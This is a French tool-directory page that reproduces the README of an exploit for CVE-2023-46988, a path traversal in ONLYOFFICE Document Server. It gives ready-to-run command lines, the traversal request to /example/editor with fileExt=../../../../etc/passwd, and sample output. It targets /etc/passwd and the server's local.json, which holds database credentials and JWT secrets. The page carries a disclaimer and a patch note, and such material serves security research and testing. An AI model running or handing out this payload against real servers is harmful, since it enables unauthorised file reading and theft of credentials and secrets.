Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
OnlyOffice-path-traversal — CVE-2023-46988 : Exploit de traversée de chemin ONLYOFFICE | Kitploit
Outils/GitHubGitHub/mihat2/onlyoffice-path-traversal
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionApprentissage et Éducation
GitHubmihat2/onlyoffice-path-traversal

OnlyOffice-path-traversal

CVE-2023-46988 : Exploit de traversée de chemin ONLYOFFICE

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit de traversée de chemin ONLYOFFICE (CVE-2023-46988)

📌 Présentation

Ce script exploite une vulnérabilité de traversée de chemin dans ONLYOFFICE Document Server (CVE-2023-46988) qui permet à des utilisateurs non autorisés de copier des fichiers arbitraires depuis le serveur. La vulnérabilité existe dans le point de terminaison /example/editor, où le paramètre fileExt peut être manipulé pour accéder à des fichiers système et de configuration sensibles.

⚠️ Avertissement

Cet outil est destiné uniquement à des fins éducatives et de recherche en sécurité autorisée.
Toute utilisation non autorisée contre des systèmes sans autorisation explicite est illégale et contraire à l'éthique.

🛠 Fonctionnalités

  • Récupère les fichiers sensibles par défaut :
    • /etc/passwd
    • /etc/onlyoffice/documentserver/local.json (contient les identifiants de base de données et les secrets JWT)
  • Spécifie n'importe quel chemin de fichier à récupérer avec l'argument --file.
  • Prend en charge le proxy optionnel pour l'interception Burp Suite (--proxy).
  • Prend en charge la vérification SSL optionnelle (--verify).
  • Corrige les problèmes d'encodage lors du téléchargement de fichiers avec des caractères spéciaux.

🚀 Utilisation

1️⃣ Utilisation de base (Récupérer les fichiers par défaut)

root@kitploit:~
python onlyoffice_exploit.py http://localhost

Ceci récupère :

  • /etc/passwd
  • /etc/onlyoffice/documentserver/local.json

2️⃣ Récupérer un fichier personnalisé (ex. /etc/hosts)

root@kitploit:~
python onlyoffice_exploit.py http://localhost --file /etc/hosts

3️⃣ Activer le proxy (ex. Burp Suite sur 127.0.0.1:8080)

root@kitploit:~
python onlyoffice_exploit.py http://localhost --proxy
root@kitploit:~
python onlyoffice_exploit.py http://localhost --proxy http://127.0.0.1:8080

4️⃣ Activer la vérification SSL

root@kitploit:~
python onlyoffice_exploit.py https://example.local --verify

5️⃣ Combiner proxy et vérification SSL

root@kitploit:~
python onlyoffice_exploit.py https://example.local --file /etc/hosts --proxy --verify

🔍 Comment cela fonctionne

  1. Envoie une requête à /example/editor avec un paramètre fileExt malveillant :
    root@kitploit:~
    GET /example/editor?fileExt=../../../../../../../../etc/passwd
    
  2. Extrait l'URL de redirection de la réponse.
  3. Analyse le nom de fichier redirigé depuis la réponse.
  4. Corrige les problèmes d'encodage pour les caractères spéciaux dans les noms de fichiers.
  5. Télécharge le fichier depuis /example/download?fileName=<nom_de_fichier_extrait>.

🛠 Exemple de sortie

root@kitploit:~
[*] URL cible : http://localhost
[*] Tentative de récupération : /etc/passwd
[*] Envoi de la requête à : http://localhost/example/editor?fileExt=../../../../../../../../etc/passwd
[+] URL de redirection extraite : http://localhost/example/download?fileName=.passwd
[+] Nom de fichier extrait : .passwd
[*] Téléchargement du fichier : http://localhost/example/download?fileName=.passwd
[+] Fichier téléchargé avec succès : .passwd

🔒 Atténuation

ONLYOFFICE a corrigé cette vulnérabilité dans sa mise à jour de février 2024.
Les utilisateurs doivent mettre à jour vers la dernière version pour protéger leurs serveurs.

🐜 Licence

Ce projet est sous licence MIT License – voir le fichier LICENSE pour plus de détails.

Télécharger l’outil